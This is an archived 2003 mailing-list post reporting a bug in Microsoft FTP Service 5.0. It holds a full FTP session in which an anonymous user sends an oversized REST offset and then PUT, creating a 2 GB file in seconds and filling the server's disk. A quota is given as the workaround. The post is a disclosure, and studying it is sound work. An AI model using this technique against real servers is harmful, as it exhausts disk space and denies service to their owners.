Vulnerability Development mailing list archives

lame ms-ftp large file creation bug

From: "wirepair" <wirepair () roguemail net>
Date: Sat, 08 Nov 2003 16:45:24 -0800

lo all,
bug or feature:
fbi@mindcreeper:~/test$ for i in `seq 1 4` ; do touch heh$i ; done
fbi@mindcreeper:~/test$ ftp 192.168.1.248
Connected to 192.168.1.248.
220 boom Microsoft FTP Service (Version 5.0).
Name (192.168.1.248:fbi): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
Remote system type is Windows_NT.
ftp> cd uploads
250 CWD command successful.
ftp> rest 99999999999999999
restarting at 2147483647. execute get, put or append to initiate transfer
ftp> put heh1
local: heh1 remote: heh1
200 PORT command successful.
350 Restarting at 2147483647.
150 Opening ASCII mode data connection for heh1.
226 Transfer complete.
ftp> rest 9999999999999
restarting at 2147483647. execute get, put or append to initiate transfer
ftp> put heh2
local: heh2 remote: heh2
200 PORT command successful.
350 Restarting at 2147483647.
550 heh2: There is not enough space on the disk.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
11-08-03  07:28PM                   10 heh
11-08-03  07:40PM           2147483647 heh1
11-08-03  07:40PM                    0 heh2
226 Transfer complete.

2gb files in 2 seconds. My only work around was setting an ntfs level quota on the IUSR_<machinename>.
-wire

--
Visit Things From Another World for the best
comics, movies, toys, collectibles and more.
http://www.tfaw.com/?qt=wmf

Current thread:

lame ms-ftp large file creation bug wirepair (Nov 09)
- <Possible follow-ups>
- Re: lame ms-ftp large file creation bug Dave Korn (Nov 12)
  - Re: lame ms-ftp large file creation bug exon (Nov 12)